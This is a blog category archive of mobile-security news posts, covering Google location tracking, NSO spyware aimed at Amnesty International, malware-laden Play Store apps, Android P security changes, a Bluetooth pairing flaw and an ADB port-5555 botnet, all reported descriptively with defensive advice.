Category Archives: Mobile

Google tracks users’ movements even if they have disabled the “Location History” on devices

According to the AP, many Google services on both Android and iPhone store records of user location even if the users have disabled the “Location History”.

According to a recent investigation conducted by the Associated Press, many Google services on both Android and iPhone devices store records of user location data, and the bad news is that they do it even if the users have disabled the “Location History” on devices.

When a user disables the “Location History” from the privacy settings of Google applications, he should prevent Google from stole location data.

Currently, the situation is quite different, experts from AP discovered that even when users have turned off the Location History, some Google apps automatically store “time-stamped location data” without explicit authorization.

“Google says that will prevent the company from remembering where you’ve been. Google’s support page on the subject states: “You can turn off Location History at any time. With Location History off, the places you go are no longer stored.”

That isn’t true. Even with Location History paused, some Google apps automatically store time-stamped location data without asking. (It’s possible, although laborious, to delete it .)” reads the post published by AP.

“For example, Google stores a snapshot of where you are when you merely open its Maps app. Automatic daily weather updates on Android phones pinpoint roughly where you are,”

“And some searches that have nothing to do with location, like “chocolate chip cookies,” or “kids science kits,” pinpoint your precise latitude and longitude—accurate to the square foot—and save it to your Google account.”

The AP has used location data from an Android smartphone with ‘Location History’ disabled to desing a map of the movements of Princeton postdoctoral researcher Gunes Acar.

Location History

 

Data plotted on the map includes records of Dr. Acar’s train commute on two trips to New York and visits to the High Line park, Chelsea Market, Hell’s Kitchen, Central Park and Harlem other markers on the map, including Acar’s home address.

“The privacy issue affects some two billion users of devices that run Google’s Android operating software and hundreds of millions of worldwide iPhone users who rely on Google for maps or search.” continues the AP.

Google replied to the study conducted by the AP with the following statement:

“There are a number of different ways that Google may use location to improve people’s experience, including Location History, Web, and App Activity, and through device-level Location Services. We provide clear descriptions of these tools, and robust controls so people can turn them on or off, and delete their histories at any time.” states Google.

Jonathan Mayer, a Princeton researcher and former chief technologist for the FCC’s enforcement bureau, remarked that location history data should be disabled when the users switch off’ the Location History,

“If you’re going to allow users to turn off something called ‘Location History,’ then all the places where you maintain location history should be turned off. That seems like a pretty straightforward position to have.”

The good news is it is possible to stop Google from collecting your location, it is sufficient to turn off the “Web and App Activity” setting, anyway, Google will continue to store location markers.

Open your web browser, go to myactivity.google.com, select “Activity Controls” and now turn off the “Web & App Activity” and “Location History. features”

For Android Devices:
Go to the “Security & location” setting, select “Privacy”, and tap “Location” and toggle it off.

For iOS Devices:
Google Maps users can access Settings → Privacy Location Services and change their location setting to ‘While Using’ the app.

Pierluigi Paganini

(Security Affairs – Location Data, Google)

The post Google tracks users’ movements even if they have disabled the “Location History” on devices appeared first on Security Affairs.

Fortnite APK is coming soon, but it will not be available on the Google Play Store

Fortnite, the most popular game will be soon available for Android users but the Fortnite APK will not be in the Play Store.

Fortnite continues to be the most popular game, it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The great success obtained by the Fortnite attracted cyber criminals that are attempting to exploit its popularity to target its fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet, it is currently under development while the iOS version was released in March by Epic Games.

In the recent months, crooks attempted to take advantage of Android users’ interest in an alleged version for their devices of the popular game.

Experts discovered many blog posts and video tutorial with instructions to install fake Fortnite Android App.

Scammers are exploiting this interest to trick Android fans into downloading tainted version of the game that can compromise Android devices.

Fortnite APK

Now there is a news for the Android fans of the popular game, Epic Games confirmed the Fortnite APK for Android will be available for download exclusively only through its official website and not through the official Google Play Store.

According to the Epic Games CEO Tim Sweeney in this way, the company will have “have a direct relationship” with its consumers and will allow saving 30 percent fee that Google maintains when users download a software from the Play Store.

“The awesome thing about Fortnite is it’s brought a huge volume of digital commerce to Epic. We can now do that very efficiently. We can handle payment processing and customer support and download bandwidth with some great deals. We’re passing the savings along with the Unreal Engine Marketplace. We’ve change the royalty split from the 30/70 you see everywhere to developers getting 88 percent. We find that’s a great boon for developers.” Sweeney told GamesBeat.

Sweeney explained that the share of profits for the version running on Microsoft or Nintendo is right because the “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Sweeney considers disproportionate 30% cut on the fee applied by Google for its services but evidently doesn’t evaluate the security features implemented by the Google store to avoid crooks will serve tainted versions of the Fortnite APK.

Even if in the past we have found several malicious apps uploaded to the Play Store, we cannot underestimate the Google’s efforts for the security of its users.

The availability of Fortnite APK on a third-party website could expose Android users to the risk of infection.

The only way to download an APK from a third-party store is to manually enable “Install Apps from Unknown Sources” option in the settings.

A large number of Android users will search “how to install Fortnite on Android,” these fans could be targeted in various ways, for example in black SEO campaigns devised to infect their devices.

“The move will simply encourage users to manually enable “Install Apps from Unknown Sources” option in the settings menu or accept a variety of Android security prompts in order to install Fortnite game directly from the Epic Games website.” reported The Hacker News.

“So, thousands of people out there searching, “how to install Fortnite on Android” or “how to download Fortnite APK for Android” on the Internet, could land themselves on unofficial websites, ending up installing malware.”

In order to install Fortnite on Android, players will have to download the Fortnite Launcher from the official Epic website, then it will allow them to load the Fortnite Battle Royale onto their devices.

Attackers can impersonate the legitimate source, for example by carrying out phishing campaign to trick Android users into downloading tainted version of Fortnite APK.

Stay Tuned …

Pierluigi Paganini

(Security Affairs – Fortnite APK, gaming)

The post Fortnite APK is coming soon, but it will not be available on the Google Play Store appeared first on Security Affairs.

Smashing Security #089: Data breaches, ransomware, Bitcoin robberies, and typewriters

Smashing Security #089: Data breaches, ransomware, Bitcoin robberies, and typewriters

Ransomware rears its head again, Dixons Carphone reveals its data breach was almost 1000% worse than they previously thought, a man is accused of stealing five million dollars worth of cryptocurrency through hijacking mobile phones, and a Canadian guy called Norman is rushing to get the typewriters out of storage.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by journalist Geoff White.

Amnesty International employee targeted with NSO group surveillance malware

An employee at Amnesty International has been targeted with Israeli surveillance malware, the news was revealed by the human rights group.

Amnesty International revealed that one of its employees was targeted with a surveillance malware developed by an Israeli firm.

The human rights group published a report that provides details on the attack against its employee. The hacker attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

This SMS message translates to:

“Court order #XXXXXX issued against identity owner **** on XX/XX/XXX”

[link]”

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

“In June 2018, an Amnesty International staff member received a malicious WhatsApp message with Saudi Arabia-related bait content and carrying links Amnesty International believes are used to distribute and deploy sophisticated mobile spyware. Through the course of our subsequent investigation we discovered that a Saudi activist based abroad had also received similar malicious messages.” reads the report published Amnesty International.

“In its analysis of these messages, Amnesty International found connections with a network of over 600 domain names. Not only are these domain names suspicious, but they also overlap with infrastructure that had previously been identified as part of Pegasus, a sophisticated commercial exploitation and spyware platform sold by the Israel surveillance vendor, NSO Group.”

The servers identified by the experts were matching NSO Group’s description of Pegasus in the Hacking Team leaked document, they found two other connections to NSO Group:

  • evidence that connects the malicious links used by the attackers and collected with NSO Group network infrastructure that was previously detailed by researchers at Citizen Lab.
  • a domain registration pattern showing that most of the domains in the NSO Group infrastructure were registered during Israeli working days and hours.

“With the technique we developed, we were then able to identify over 600 servers that demonstrated similar behavior. Among these we found servers that hosted domain names that have been previously identified as connected to NSO Group by Citizen Lab and others, specifically banca-movil[.]compine-sales[.]com, and ecommerce-ads[.]org.” continues the report.

There are several companies that develop surveillance platforms for targeting mobile devices, the NSO Group operated in the dark for several years, until the researchers from the Citizenlab organization and the Lookout firm spotted its software in targeted attacks against UAE human rights defender, Ahmed Mansoor.

The researchers also spotted other attacks against a Mexican journalist who reported to the public a story of the corruption in the Mexican government.

NSO replied that its surveillance solution was “intended to be used exclusively for the investigation and prevention of crime and terrorism.”

People familiar with the NSO Group confirmed that the company has an internal ethics committee that monitors the sales and potential customers verifying that the software will not be abused to violate human rights.

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

The traces collected by Amnesty International was corroborated by the findings of the investigation conducted by researchers at the internet watchdog Citizen Lab.

“Amnesty International shared the suspicious messages with us and asked us to verify their findings, as we have been tracking infrastructure that appears to be related to NSO Group’s Pegasus spyware since March 2016.” reads the analysis published by Citizen Lab.

“Based on our analysis of the messages sent to these individuals, we can corroborate Amnesty’s findings that the SMS messages contain domain names pointing to websites that appear to be part of NSO Group’s Pegasus infrastructure.”

Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

Country Nexus Reported cases of individuals targeted Year(s) in which spyware infection was attempted
Panama Up to 150 (Source: Univision)1 2012-2014
UAE 1 (Source: Citizen Lab) 2016
Mexico 22 (Source: Citizen Lab) 2016
Saudi Arabia 2 (Source: Amnesty, Citizen Lab) 2018

Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, recent discovery demonstrates that trading of surveillance software is going out-of-control.

“This is a huge market that’s completely opaque and under-regulated,” he concluded.

Pierluigi Paganini

(Security Affairs – Amnesty International, surveillance)

The post Amnesty International employee targeted with NSO group surveillance malware appeared first on Security Affairs.

Hundreds of apps removed from Google Play store because were carrying Windows malware

Google recently removed 145 applications from the official Google Play store because they were found to carry malicious Windows executables inside.

Researchers from Palo Alto Networks revealed that Google removed more than 145 apps from the Play store  because they were carrying a Windows malware,

The apps were uploaded to the Google Play store between October and November 2017, this means that for months Android users were exposed to the attack. In some cases, the apps have been downloaded thousands of times and were rated with 4-stars.

The malicious code included in the code of the app was developed to compromised Windows systems and leverage the Android device as an attack vector.

“Notably, the infected APK files do not pose any threat to Android devices, as these embedded Windows executable binaries can only run on Windows systems: they are inert and ineffective on the Android platform.” reads the analysis published by Palo Alto networks.

“The fact that these APK files are infected indicates that the developers are creating the software on compromised Windows systems that are infected with malware. This type of infection is a threat to the software supply chain, as compromising software developers has proven to be an effective tactic for wide scale attacks.”

Palo Alto Networks reported that the malicious PE files when executed on a Windows system will perform these suspicious activities:

  • Creates executable and hidden files in Windows system folders, including copying itself
  • Changes Windows registry to auto-start themselves after restarting
  • Attempts to sleep for a long period
  • Has suspicious network connection activities to IP address 87.98.185.184 via port 8829

Some of the apps included multiple malicious PE files at different locations, with different file names, anyway the experts the experts noticed that malware were found embedded in most applications.

The researchers discovered that one of malware was included in 142 APKs, a second malicious code was found in 21 APKs. 15 apps were found containing both PE files inside.

In one case, the malicious PE file that was included in the APK of most of the Android apps was a keylogger.

“After investigating all those malicious PE files, we found that there is one PE file which infects most of the Android apps, and the malicious activity of that PE file is key logging.” continues the analysis.

“On a Windows system, this key logger attempts to log keystrokes, which can include sensitive information like credit card numbers, social security numbers and passwords.”

Google play store infected apps

The attackers attempted to conceive the PE files by using fake names that look like legitimate, such as Android.exe, my music.exe, COPY_DOKKEP.exe, js.exe, gallery.exe, images.exe, msn.exe and css.exe.

The researchers discovered that not all the apps uploaded by the same developers were infected with the malicious files, likely because they were using different development platform for the apps.

“The malicious PE files cannot directly run on the Android hosts. However, if the APK file is unpacked on a Windows machine and the PE files are accidentally executed, or the developers also issue Windows-based software, or if the developers are infected with malicious files runnable on Android platforms, the situation will go much worse.” concludes Palo Alto Networks.

“The development environment is a critical part of the software development life cycle. We should always try to secure it first. Otherwise other security countermeasures could just be attempts in vain,” 

Pierluigi Paganini

(Security Affairs – Play Store,  malware)

The post Hundreds of apps removed from Google Play store because were carrying Windows malware appeared first on Security Affairs.

Secure Access as a Business Accelerator: a Conversation with Pulse Secure

In this Security Ledger Conversations Video, we speak with Sudhakar Ramakrishna, the CEO of the firm Pulse Secure on that company’s journey from Juniper Networks’ remote access business unit to a thriving, independent company selling secure access technology to firms with on premises, cloud and mobile deployments. Technology has...

Read the whole entry... »

Related Stories

An AI Chatbot and Voice Assistant for the Mobile Employee

Have a look around, and you might notice that chatbots and voice assistants have permeated our lives — bringing an air of excitement and efficiency to manual tasks and chores. Considering the amount of time and effort we expend at the office, it’s about time that assistants make their way to the workplace.

Although IT and security leaders are making ongoing strides to ensure their workers are enabled with the most cutting-edge technology, the employees they support continue to dedicate countless hours to basic tasks that could otherwise be delegated to an artificial intelligence (AI)-powered sidekick.

It can also be a struggle for workers to overcome learning curve challenges or get on-the-go help with support-related issues. Think about the number of requests and tickets that could be avoided if users had the ability to get this level of support from an AI voice assistant.

Why Mobile Employees Could Use Some Assistance

It can be frustrating trying to find a specific email or attachment when on a mobile device, oftentimes leading to multiple searches and dead ends. Think of how many times you’ve said things like, “Sure, I’ll pull that up and send it over when I get back to my laptop.”

It’s even more frustrating attempting to schedule a meeting when the organizer is forced to look up the availability of all the participants, type out the title and define an agenda. Something that is seemingly simple is anything but when put into practice.

Smartphones and tablets are designed provide everything you need in the palm of your hand, but sometimes there’s too much in front of you to know how to prioritize. Imagine the headaches that could be avoided if employees had a helper that could constantly query their emails, calendars and contacts for them and notify them when they’ve let an email response to an important person — such as their boss — slip a bit too long.

There also can be times when devices just don’t work the way they’re supposed to. Perhaps you’re having trouble figuring out how to do something, like how to reset your passcode or turn on notifications, for example. In times like these, employees want on-demand support, but without a viable alternative, they turn to their IT helpdesk team to answer the call.

Join the Aug. 23 webinar: Help is on its way! A Sidekick For Your Mobile Workforce

Say Hello to an AI-Enabled Voice Assistant

IBM MaaS360, an industry leader in unified endpoint management (UEM), is pleased to introduce MaaS360 Assistant, the latest addition to its unique assortment of AI offerings. Enabled by chat and voice, MaaS360 Assistant is available for use by mobile employees today through open beta.

Programmed to improve productivity and deliver the best possible user experience, MaaS360 Assistant is now at the ready to respond to common questions across email, corporate contacts and calendar using natural language processing (NLP) capabilities.

An Even Better MaaS360 Assistant Tomorrow

Assistant was developed with AI capabilities that enable it to learn, evolve and become more accurate over time. In fact, it’s already begun learning.

Soon, this intelligence voice assistant will deliver notifications and insights that improve user awareness and prioritization surrounding their everyday activities, making it possible to follow up with the click of a button. For example, if your boss emailed you a week ago and you haven’t responded, you’ll get a nudge.

It’ll also be able to provide expert support and guidance, eliminating the user’s need to depend on the support team to resolve common issues.

Finally, the solution will integrate with third-party enterprise apps (e.g., human resources, customer relationship management and content management). Instead of swapping between enterprise apps, users can now rely on AI and NLP capabilities to perform tasks and get information.

Get Acquainted With Assistant

MaaS360 customers with Secure Mail are all set to enable their mobile employees. Just check in with your account manager to learn how to take full advantage.

To see MaaS360 Assistant in action and learn more about what it has to offer, register for the live webinar, “Help Is On Its Way! A Sidekick for Your mobile workforce,” on Aug. 23 at 11 a.m. EST.

The post An AI Chatbot and Voice Assistant for the Mobile Employee appeared first on Security Intelligence.

Google bans cryptocurrency mining apps from the official Play Store

Google has updated the Play Store Developer Policy page to ban mobile mining apps that mine cryptocurrencies using the computational resources of the devices.

Due to the surge in cryptocurrency prices, many legitimate websites and mobile apps are increasingly using cryptocurrency miners.

Following Apple’s decision of banning cryptocurrency mining apps announced in June, also Google has updated the Play Store Developer Policy page to ban mobile apps that mine cryptocurrencies using the computational resources of the devices.

“We don’t allow apps that mine cryptocurrency on devices,” reads the entry included in the policy.

Google will start to remove any app from the official Play Store that uses a device’s resources for mining operations, but it clarified that “apps that remotely manage the mining of cryptocurrency” are not included in the ban.

Mining activities have a dramatic effect on the performance of the device and in some cases, it could also damage it by causing overheat or destroy batteries.

In December, experts from Kaspersky have spotted an Android malware dubbed Loapi that includes a so aggressive mining component that it can destroy your battery.

mining apps

Last month, Google banned cryptocurrency mining extensions from its Chrome Web store after finding many of them abusing users’ resources without consent.

Since January, Facebook also banned ads that promote financial products and services that are frequently associated with misleading or deceptive promotional practices, such as binary options, initial coin offerings, and cryptocurrency.

Pierluigi Paganini

(Security Affairs – mining apps, Google)

The post Google bans cryptocurrency mining apps from the official Play Store appeared first on Security Affairs.

New Android P includes several security improvements

According to the Android developer Program Overview, the next major version of Android, Android 9.0 or P, is set to arrive soon. Their plans show a final release within the next three months (Q3 2018).

The end of the Android P beta program is approaching, with the first release candidate built and released in July. As a security company, we simply can’t help but take a close look at what kind of security updates will be included in Android’s newest version.

We are not going to write about new features of Android P, but instead will focus our attention on security improvements. Android P introduces a number of updates that enhance the security of your apps and the devices that run them.

Improved fingerprint authentication

For our own safety, most devices (and many apps) have an authentication mechanism. The new Android P OS provides improved biometrics-based authentication. In Android 8.1, there were two new metrics that helped its biometric system repel attacks: Spoof Accept Rate (SAR) and Imposter Accept Rate (IAR). Along with a new model that splits biometric security into weak and strong, biometric authentication becomes more reliable and trustworthy in Android P.

Android P also promises to deliver a standardized look, feel, and placement for the dialog that requests a fingerprint. This increases user’s confidence that they are interacting with a trusted source. App developers can trigger the new system fingerprint dialog using a new BiometricPrompt API, and it’s recommended to switch over to the new system dialog as soon as possible. The platform itself selects an appropriate biometric to authenticate with; thus developers don’t need to implement this logic by themselves.

Biometric authentication mechanisms are becoming increasingly popular and they have a lot of potential, but only if designed securely, measured accurately, and implemented correctly.

Signature Scheme v3

Android P pushes support for APK Signature Scheme v3. The major difference from v2 is key rotation support. Key rotation will be useful for developers, as this scheme has ApkSignerLineage included. As the review committee states:

“The signer lineage contains a history of signing certificates with each ancestor attesting to the validity of its descendant. Each additional descendant represents a new identity that can sign an APK. In this way, the lineage contains a proof of rotation by which the APK containing it can demonstrate, to other parties, its ability to be trusted with its current signing certificate, as though it were signed by one of its older ones. Each signing certificate also maintains flags which describe how the APK itself would like to trust the old certificates, if at all, when encountered.”

This gives you an opportunity to sign with a new certificate easily. You simply link the APK files to the ones with which they are now signed.

Although Scheme v3 turns on by default, note that you can still use an old signing certificate.

HTTP Secure (HTTPS) by default

Nowadays, many apps are still transmitting users’ information unencrypted, making personal data vulnerable to hackers. People bothered by potential for breach or invasion of privacy can feel more secure knowing their transmissions in Android P will be secure by default.

In Android P, third-party developers will have to enable HTTPS (It was optional in Android 8.0) for their apps. However, they can still ignore the advice and specify certain domains that will deliver unencrypted traffic.

Protected confirmation

A protected confirmation API exists in all devices launched with Android P. Using this API, apps can use the ConfirmationPrompt class to display confirmation prompts to the user, asking them to approve a short statement. This statement allows the app to confirm that the user would like to complete a sensitive transaction, such as making a bill payment.

Right after the statement acceptance, your app receives a cryptographic signature, protected by a keyed-hash message authentication code (HMAC). The signature is produced by the trusted execution environment (TEE). This protects the display of the confirmation dialog, as well as user input. The signature indicates, with high confidence, that the user has seen the statement and has agreed to it.

Hardware security module

Here’s an additional update that benefits everyone: Devices with Android P will be supporting a StrongBox Keymaster. The module contains its own CPU, secure storage, and a true random number generator. It also protects against package tampering and unauthorized sideloading of apps.

In order to support StrongBox implementations, Android P uses subset of algorithms and key sizes, such as:

  • RSA 2048
  • AES 128 and 256
  • ECDSA P-256
  • HMAC-SHA256 (supports key sizes between 8 bytes and 64 bytes, inclusive)
  • Triple DES 168

Peripherals background policy

With Android P, apps will not be able to access your smartphone’s microphone, camera, or sensors. Users get a notification when apps attempt to access these in the background. On attempting, the microphone will report empty audio, cameras will disconnect (causing an error if the app tries to use them), and all sensors will stop reporting events.

Backup data encryption update

It’s not a secret that Android backs up data from your device. Users can then restore data after signing into their Google account from another device. Starting with Android P, it’ll start using a client-side secret method for its encryption. This means encryption will be done locally on the device, whereas before, a backup of your device was encrypted directly on the server.

Because of this new privacy measure, users will need the device’s PIN, pattern, or password to restore data from the backups made by their device.

Wrapping things up

All these improvements mean only one thing: It’ll be significantly harder for criminals to access your data when they shouldn’t be able to. With the massive amounts of breaches over the last two years, this should come as a relief for consumers, who simply want to use their phones without fear of privacy being compromised.

The post New Android P includes several security improvements appeared first on Malwarebytes Labs.

Trojans: What’s the real deal?

The fictional Greeks hiding in their legendary Trojan horse would probably be excited to learn that the default Wiki page for Trojan is, in fact, their big wooden horse thingy (vs. computer infections or dubious businesses).

Sorry, fictional ancient Greek warriors. It’s not that we don’t think you’re a big deal—that film with Brad Pitt was at least a 6 out of 10. It’s just that at this point in time, the Trojans we’re most concerned about are the tiny ones that sneak onto your PC under cover of darkness, then lay waste to Troy.

And by Troy I mean our PCs.

The term “Trojan” as we understand it first came to life in the 1970s, used in a USAF report about vulnerabilities in computers [PDF]. The application of said digital Trojan horse is fairly straightforward: a computer program, pretending to be something it’s not, is installed and executed on the target system. For example, a victim could open up a file named dolphin.exe and thinks they’re looking at a fun game called Dolphin. But in reality, all of their personal information is being harvested covertly and sent back to base.

The Trojan hall of shame

The first big-name Trojans many of us in the IT space may remember dealing with date back to the late 1990s and early 2000s. That includes Netbus, Bifrost, and Sub7, though the bulk of the cybercrime spoils went to the notorious Zeus in 2007. After that, Trojans were in business, with DarkComet, the Blackhole exploit kit, which would (for example) push Java or Carberp Trojans, and Koobface (an anagram of Facebook), which would typically pretend to be a video as bait to install a worm.

Most of these have long since gone to the great wooden horse paddock in the sky, but Zeus continues to linger by virtue of having its code leaked in 2011, forming the building blocks for many, many Trojan attacks since then.

Social engineering at its finest

Fittingly, social engineering plays a major part in the Trojan proceedings. A splash of societal pressure, or even just a “Hey, this is cool” is often enough to get someone to compromise their personal computer by their own hand.

You’ve won this free thing! Click here and take a look!

Wait, are hackers bearing gifts now? Though there are no ancient Trojan warriors offering up towering wooden structures, you can bet there’ll be a wide variety of confidence tricks on display. You might get a cool laptop sticker or a pair of novelty-branded socks at an event. Or, you might get this:

Email: Hi, check out this adorable dolphin! Run this file dolphin.exe, it’s great!
Social media: Enter our sweepstakes to win an adorable dolphin!!! Be sure to run dolphin.exe to stand a chance of winning.
Instant messaging: Adorable dolphin webcams. Only $4.99 a month! Download this dolphincam.exe to get started.
Suspiciously abandoned USB stick: Wow, you’ve found my suspiciously abandoned USB stick. Way to go! If you want to return my adorable dolphin photos, please run adorabledolphinphotos.exe to see my address.

Despite the variance in attack methods described above, they’re all using executables disguised as harmless files (Trojans). Types of Trojan vary wildly and encompass everything from government-developed files to people on forums making their own special home-brew versions. We’ve listed the main categories of Trojans below.

Types of Trojans

Financial

Plenty of financially-motivated Trojans exist, typically doubling up with keyloggers to try and exfiltrate online banking information. Some may try and snoop connections by performing man-in-the-middle attacks, or dropping a fake bank login page on the PC so the victim happily hands over their credentials. Others take an alternative approach and simply scan the PC for anything that looks like login data stored in a text file, or insecure passwords saved in a browser.

Botnets

Backdoor the system, and the sky’s the limit. However, botnets are an old favourite of malware authors, and dropping some files that can take commands from a Command & Control server is just what the doctor ordered. Once tagged into a botnet, your machine’s power as a rogue node is amplified many times over, alongside its compromised brethren. In situations where the attackers aren’t particularly interested in your personal information, they may well just use you to join in on a Distributed Denial of Service (DDoS) attack instead.

Ransomware

The ubiquitous ransomware is often served up to potential victims disguised as something else in order to lock up the target PC then demand a ransom. It could be delivered via malspam or phishing and spearphishing campaigns, which tricked users into opening emails from untrustworthy sources.

General data collection/system tampering

The intention behind using a Trojan may be to try and grab card details, or personal information, or download additional malware files, or even just sit quietly in the background and monitor all activity for reasons known only to the attackers. It’s really up to the attacker, and as a result, the definition of “Trojan” can sometimes be murky.

For example, droppers and downloaders are two types of Trojans that do exactly what their names suggest: adding additional bad files onto the system. But what’s the motivation for adding more bad files? Maybe they just want to keep an eye on things for a later date, installing a remote administration tool that keeps a backdoor open and gathers fresh data as you go about your business. Maybe some of your browsing habits trigger another social engineering attack, which attackers can now do easily with access to your system. Or perhaps the data gathered on you is sold to other organizations for marketing purposes, and now you can’t stop getting junk email.

This is nowhere near an exhaustive list, but just an example of the kind of mischief Trojans can cause and create.

Gift horse, mouth, do not look

Regardless of intention, turning your PC into an open access gateway for Trojan dolphins—er, horses—is a bad idea indeed. Even if the initial Trojan is removed from the computer (assuming it hasn’t already self deleted), there’s often no way of telling what else has been placed onboard.

Unlike some other forms of attack, Trojans never really go out of fashion. Only a few weeks ago, fake Fortnite files were causing waves over in Androidland, promising free game points but offering up unrelated downloads instead. Social engineering will never go away, and dressing up a rogue file in attractive packaging goes a long way toward compromising a system.

Feel free to read up on our many social engineering posts because that’ll give you a great head start against your horsey adversary. And if the ancient Greeks had practiced better deduction and use of common sense—You’re in the middle of war. Why invite a giant wooden structure inside your walls?!—they would have surely vanquished the clever Trojans.

The post Trojans: What’s the real deal? appeared first on Malwarebytes Labs.

CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic

Security researchers have found a high severity flaw (CVE-2018-5383) affecting some Bluetooth implementations that allow attackers to manipulate traffic.

Security researchers at the Israel Institute of Technology have found a high severity vulnerability affecting some Bluetooth implementations that could be exploited by an unauthenticated remote attacker in physical proximity of two targeted devices to monitor and manipulate the traffic they exchange.

The issue tracked as CVE-2018-5383 affects the Secure Simple Pairing and LE Secure Connections features, it affects firmware or drivers from some major vendors including Apple, Broadcom, Intel, and Qualcomm.

The Bluetooth specifications recommend that devices supporting the above features validate the public key exchanged during the pairing process.

Experts from Bluetooth Special Interest Group (SIG), the group that oversees the development of Bluetooth standards, explained that some vendors do not implement public key validation.

Basically, a nearby attacker can launch a man-in-the-middle (MitM) attack and obtain the encryption key, then it can monitor and manipulate the traffic exchanged by the devices.

“For an attack to be successful, an attacking device would need to be within wireless range of two vulnerable Bluetooth devices that were going through a pairing procedure.” reads the advisory published by the Bluetooth SIG explained.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,”

CVE-2018-5383 Bluetooth

The Bluetooth SIG has addressed the vulnerability by updating the specification, now it is mandatory for products to implement public key validation during the pairing process.

Moreover, the Bluetooth SIG has also added testing for this vulnerability within its Bluetooth Qualification Process.

The CERT/CC published a security advisory on the flaw that includes technical details.

“Bluetooth firmware or operating system software drivers may not sufficiently validate elliptic curve parameters used to generate public keys during a Diffie-Hellman key exchange, which may allow a remote attacker to obtain the encryption key used by the device.” reads the advisory published by the CERT/CC.

According to the Bluetooth SIG, there is no evidence that the CVE-2018-5383 flaw has been exploited attacks in the wild.

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” added the Bluetooth SIG.

Both Apple and Intel have rolled out security patches to address the CVE-2018-5383 vulnerability.

According to Intel, the vulnerability affects the Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families.

The vendor has already rolled out both software and firmware updates to fix the issue.

According to Broadcom, some of its products supporting Bluetooth 2.1 or newer technology may be impacted, it also added that security fixes were already provided to OEM customers.

Pierluigi Paganini

(Security Affairs – CVE-2018-5383,  hacking)

The post CVE-2018-5383 Bluetooth flaw allows attackers to monitor and manipulate traffic appeared first on Security Affairs.

Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.

In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb.) According to the Google developer portal,

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tools is being used in a secured environment, it presents little risk. It is recommended that the adb service is disabled before releasing devices to consumers and it is common for the adb service to be restricted to USB connectivity only.

In early June security researcher Kevin Beaumont, warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet, “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”

ADBPort debugging tools

The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server,  then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.

The Trend Micro researchers offer a few suggestions to reduce your risk:

  • On your mobile device, go to settings, select “Developer Options” and ensure that “ADB (USB) debugging and “Apps from Unknown Sources” are turned off
  • Apply recommended patches and updates from the vendor
  • Perform a factory reset to erase the malware if you feel you are infected
  • Update intrusion prevention systems (IPS) to identify potentially malicious code from reaching your device

The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting and is a frequent speaker on ICS, IoT and Blockchain risk topics. He is currently Global CISO for the ATCO Group of companies.

Pierluigi Paganini

(Security Affairs – debugging tools, hacking)

